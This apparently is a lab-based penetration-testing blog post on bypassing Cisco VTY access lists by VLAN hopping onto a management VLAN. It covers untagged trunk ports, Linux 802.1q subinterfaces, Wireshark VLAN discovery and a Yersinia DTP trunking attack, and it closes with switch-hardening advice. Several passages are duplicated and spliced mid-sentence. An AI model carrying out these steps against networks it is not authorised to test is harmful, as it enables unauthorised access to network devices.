It's a Cisco security best practice to put access control lists on VTY lines to protect the management plane from unauthorized login attempts. Most organizations that follow this best practice restrict access to a management vlan, not specific IP addresses.
What if you are in an area where none of the edge switches have the management vlan configured on a port? Are you dead in the water? Maybe not. I have found that one Cisco security best practice that most companies don't follow is to shut down unused ports, and they configure unused fiber ports as trunks or leave them defaulted. There is usually at least one SFP module that is empty, not shutdown and configured as a trunk.
These oversights will let us get onto that management vlan and bypass the ACLs that would block us if we were connected to a non-management vlan access port! In the case of the fiber port you will need a copper SFP module (GLT). If you don't have one of these in your pen test tool kit I recommend purchasing one. They can be found on eBay for around $30.
This example assumes that you know the vlan ID of the management vlan. That is information that you will have to have gotten by some means - social engineering, foot printing, requesting a copy of the config with the passwords removed, etc. Remember the Marine Corps motto - Improvise, Adapt, Overcome! Later in the blog I will show you how to use Wireshark to figure out all the active vlans.
In my lab I have a 3750 with Vlan 100 configured like this:
interface Vlan100
ip address 172.30.103.2 255.255.255.240
no ip redirects
ip ospf authentication message-digest
ip ospf message-digest-key 1 md5 7 112A3A2B36
end
access-list 10 permit 172.30.103.0 0.0.0.15
access-list 10 deny any log
line vty 0 4
access-class 10 in
end
To log in using SSH you must be on Vlan 100.
My laptop has eth0 configured with 192.168.10.172/24.
Here is a log entry from trying to log in from Eth0:
%SEC-6-IPACCESSLOGNP: list 10 denied 0 192.168.10.172 -> 0.0.0.0, 1 packet
Let's get started
Insert the GLT SFP module and connect an Ethernet cable to your laptop.
Configure Linux to use Vlans
I'm running Ubuntu 14.04 LTS. I took the setup of Linux for Vlans from the "HowTo: Configure Linux Virtual Local Area Network" nixCraft article listed in the Reference section. The nixCraft site is a great resource for Linux information.Install the "vlan" package:
sudo apt install vlanLoad the Vlan tagging kernel driver
When the vlan package finishes installing, check to see if the 802.1q kernel driver is loaded:lsmod | grep 8021q
if not loaded, run the following:
sudo modprobe 8021q
Then check again:
lsmod | grep 8021q
8021q 28672 0
garp 16384 1 8021q
mrp 0480 1 8021q
Create the Vlan subinterface
sudo vconfig add eth0 100Add an IP address
sudo ip addr add 172.30.103.4/28 dev eth0.100Bring the Interface up
sudo ip link set up eth0.100To view the interface:
ifconfig eth0.100eth0.100 Link encap:Ethernet HWaddr 80:fa:5b:31:de:85
inet addr:172.30.103.4 Bcast:0.0.0.0 Mask:255.255.255.240
inet6 addr: fe80::82fa:5bff:fe31:de85/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:369 errors:0 dropped:0 overruns:0 frame:0
TX packets:153 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:23360 (23.3 KB) TX bytes:20761 (20.7 KB)
or
ip addr show dev eth0.100
6: eth0.100@eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 80:fa:5b:31:de:85 brd ff:ff:ff:ff:ff:ff
inet 172.30.103.4/28 scope global eth0.100
valid_lft forever preferred_lft forever
inet6 fe80::82fa:5bff:fe31:de85/64 scope link
valid_lft forever preferred_lft forever
At this point you should be able to ping the switch from Vlan 100:
mhubbard@1S1K-SYS76:~$ ping -I eth0.100 172.30.103.2
PING 172.30.103.2 (172.30.103.2) from 172.30.103.4 eth0.100: 56(84) bytes of data.
64 bytes from 172.30.103.2: icmp_seq=1 ttl=255 time=7.71 ms
64 bytes from 172.30.103.2: icmp_seq=2 ttl=255 time=2.13 ms
64 bytes from 172.30.103.2: icmp_seq=3 ttl=255 time=0.917 ms
mhubbard@1S1K-SYS76:~$ ping -I eth0.100 172.30.103.2
PING 172.30.103.2 (172.30.103.2) from 172.30.103.4 eth0.100: 56(84) bytes of data.
64 bytes from 172.30.103.2: icmp_seq=1 ttl=255 time=7.71 ms
64 bytes from 172.30.103.2: icmp_seq=2 ttl=255 time=2.13 ms
64 bytes from 172.30.103.2: icmp_seq=3 ttl=255 time=0.917 ms
Remove the Vlan config when finished
sudo vconfig rem eth0.100
You will see:
Removed VLAN -:eth0.100:-
You will see:
Removed VLAN -:eth0.100:-
Making the vlan permanent
1. Add the module to the kernel on boot:
sudo su -c 'echo "8021q" >> /etc/modules'
2. Create the interface and make it available when the system boots. Add the following lines to /etc/network/interfaces (change the values according to your scenario):
auto eth0.100
iface eth0.100 inet static
address 172.30.103.4
netmask 255.255.255.0
vlan-raw-device eth0
Configure VMware workstation to use the VLAN interface.
Now you can setup VMware Workstation so that you use a Windows or Linux VM. It's pretty easy, start the Vmware Virtual Network Editor. Click the drop down next to "Bridged To:" and select eth0.100. Save and exit the editor.
Here is a screen shot showing the Windows VM's network settings and a putty session showing me logged into the switch. You can see that the VM has an IP on the same subnet as the switch, the MAC Address of the Windows VM on the switch port and that the MAC is connected to vlan 100.
Capturing VLAN tagged traffic with Wireshark
The Wireshark Wiki had the information I needed to set Wireshark up to capture traffic on the Vlan interface. It turned out to be just a matter of selecting Eth0 as the capture interface! Below is a screenshot of a ping sent to the switch.
Find the VLANS that are in use
While in Wireshark you can set the display filter to STP and figure out which Vlans are in use. Find packets with a destination of PVST+ and look at the Packet Details pane. You will see a section labeled 802.1Q Virtural LAN. The Vlan ID will be the the last entry. You can work your way down the PVST+ packets and discover all active Vlans.
You can also see active vlans in the Packet List pane in the "Info" column
If CDP is enabled
If the port you are connected to has CDP enabled you can view a lot of useful information. Set the display filter to CDP. Select a packet and look at the Packet Details pane. You can see that CDP gives out a lot of information that could be useful.
But what if the Fiber port is shut down or not a Trunk?
Here we will rely on a port (Fibre or Copper) being in a default state. In the default state a switch port allows trunk negotiation. A Cisco security best practice is shut down unused ports but we know that isn't typical.
Another Cisco security best practice is to disable DTP negotiation on a port using "switchport nonegotiate" but that is also seldom done.
In the code below I ran "default int g1/010" and then "sh int g1/0/10 sw" to show that the default does turn on trunk negotiation.
3750x(config)#defa int g1/0/10
Interface GigabitEthernet1/0/10 set to default configuration
3750x(config)#end
3750x#sh int g1/0/10 sw
Name: Gi1/0/10
Switchport: Enabled
Administrative Mode: dynamic auto
Operational Mode: down
Administrative Trunking Encapsulation: negotiate
Negotiation of Trunking: On
Access Mode VLAN: 1 (default)
Installing Yersinia is simple because it's in the Ubuntu repository:
sudo apt install yersinia
Once it's installed run:
sudo yersinia -G
That will start the GUI. Click on the DTP tab and then click "Launch Attack" select "enable trunking".
******************************************************************************
Hubbard#sh int f1/0/12 sw
******************************************************************************
Hubbard#sh int f1/0/12 sw
Now that we can access the management vlan and CDP has shown us the management IP address we can get up to some mischief! A couple good first steps would beIn the code below I ran "default int g1/010" and then "sh int g1/0/10 sw" to show that the default does turn on trunk negotiation.
3750x(config)#defa int g1/0/10
Interface GigabitEthernet1/0/10 set to default configuration
3750x(config)#end
3750x#sh int g1/0/10 sw
Name: Gi1/0/10
Switchport: Enabled
Administrative Mode: dynamic auto
Operational Mode: down
Administrative Trunking Encapsulation: negotiate
Negotiation of Trunking: On
Access Mode VLAN: 1 (default)
Yersinia is the Tool we need now
Yersinia is an open source tool for Layer 2 attacks. In the references is a link to a Defcon video that shows some uses for Yersinia. It's not a technical deep dive for sure but it will get you started. It has many more capabilities than just negotiating a trunk. You should spend a couple hours working with it in your lab. It will cement your understanding of Layer 2 security issues.Installing Yersinia is simple because it's in the Ubuntu repository:
sudo apt install yersinia
Once it's installed run:
sudo yersinia -G
That will start the GUI. Click on the DTP tab and then click "Launch Attack" select "enable trunking".
You can see under Status that the switch sent a DTP packet showing it's in the access/desirable mode.
Here is the output from my switch:
Inital port state
******************************************************************************
Hubbard#sh int f1/0/12 sw
Name: Fa1/0/12
Switchport: Enabled
Administrative Mode: dynamic auto
Operational Mode: static access
Administrative Trunking Encapsulation: negotiate
Operational Trunking Encapsulation: native
Negotiation of Trunking: On
Access Mode VLAN: 1 (default)
Trunking Native Mode VLAN: 1 (default)
Administrative Native VLAN tagging: enabled
Voice VLAN: none
Administrative private-vlan host-association: none
Administrative private-vlan mapping: none
Administrative private-vlan trunk native VLAN: none
Administrative private-vlan trunk Native VLAN tagging: enabled
Administrative private-vlan trunk encapsulation: dot1q
Administrative private-vlan trunk normal VLANs: none
Administrative private-vlan trunk associations: none
Administrative private-vlan trunk mappings: none
Operational private-vlan: none
Trunking VLANs Enabled: ALL
Pruning VLANs Enabled: 2-1001
Capture Mode Disabled
Capture VLANs Allowed: ALL
Protected: false
Unknown unicast blocked: disabled
Unknown multicast blocked: disabled
Appliance trust: none
******************************************************************************
After the Attack
******************************************************************************
Hubbard#sh int f1/0/12 sw
Name: Fa1/0/12
Switchport: Enabled
Administrative Mode: dynamic auto
Operational Mode: trunk
Administrative Trunking Encapsulation: negotiate
Operational Trunking Encapsulation: dot1q
Negotiation of Trunking: On
Access Mode VLAN: 1 (default)
Trunking Native Mode VLAN: 1 (default)
Administrative Native VLAN tagging: enabled
Voice VLAN: none
Administrative private-vlan host-association: none
Administrative private-vlan mapping: none
Administrative private-vlan trunk native VLAN: none
Administrative private-vlan trunk Native VLAN tagging: enabled
Administrative private-vlan trunk encapsulation: dot1q
Administrative private-vlan trunk normal VLANs: none
Administrative private-vlan trunk associations: none
Administrative private-vlan trunk mappings: none
Operational private-vlan: none
Trunking VLANs Enabled: ALL
Pruning VLANs Enabled: 2-1001
Capture Mode Disabled
Capture VLANs Allowed: ALL
Protected: false
Unknown unicast blocked: disabled
Unknown multicast blocked: disabled
Appliance trust: none
******************************************************************************
******************************************************************************
For reference here are the Cisco port commands and trunking capabilities. Note that even though a port configured with "switchport mode access" will never be a trunk it still sends out DTP packets. It is a Cisco Security best practice to include "switchport nonegotiate" on access ports and trunk ports.
| Configuration Command on One Side | Short Name | Meaning | To Trunk, Other Side Must Be |
switchport mode trunk ;
switchport nonegotiate |
Nonegotiate | Always trunks on this end; does not send DTP messages (good when other switch is a non-Cisco switch) | On |
switchport mode access;
switchport nonegotiate |
Access (with nonegotiate) | Never trunks; does not send DTP messages | (Never trunks) |
| switchport mode trunk | Trunk | Always trunks on this end; sends DTP to help other side choose to trunk | On, desirable, auto |
| switchport mode dynamic desirable | Desirable | Sends DTP messages, and trunks if negotiation succeeds | On, desirable, auto |
| switchport mode dynamic auto | Auto | Replies to DTP messages, and trunks if negotiation succeeds | On, desirable |
| switchport mode access | Access | Never trunks; sends DTP to help other side reach same conclusion | (Never trunks) |
Conclusion
Brute Forcing Telnet Passwords with NMAP and Brute Forcing SNMP with NMAP. If you are successful pulling the configuration but not the telnet password try this Decrypting (recovering) Cisco Switch/Router/Firewall Passwords
Layer 2 security is often ignored because it's hard to imagine an evil employee. But if you follow Cisco's best practices for port security what I demonstrated here wouldn't be possible.
- Shut down unused ports - You can't exploit a port that is shut down.
- Use "switchport nonegotiate" on access ports so they don't send DTP packets.
- Use "switchport nonegotiate" on trunk ports so they don't send DTP packets.
- Use "switchport trunk native vlan X" on trunks. X should be an unused vlan number. This will prevent untagged traffic from accessing the network.
- Don't leave ports in a default state - Use peer reviewed templates to configure switches so no mistakes are made.
If you create a template to configure switches these best practices are free and require no extra work. I have a blog on using Excel and Word to automate device configurations. Configure Network Devices with Excel and Word Mail Merge
References
VLAN capture setup - Wireshark setup
Yersinia is a network tool designed to take advantage of some weakeness in different network protocols
Attacks at the Data Link Layer
Do We Really Need Layer 2 Security?
Attacks at the Data Link Layer
Do We Really Need Layer 2 Security?
Experimenting with VLAN hopping
A VLAN Hopping Attack
VoIP Hopper - a VoIP Pen Testing tool
voice over misconfigured internet telephones - An interesting tool for playing back pcap captures.
A VLAN Hopping Attack
VoIP Hopper - a VoIP Pen Testing tool
voice over misconfigured internet telephones - An interesting tool for playing back pcap captures.
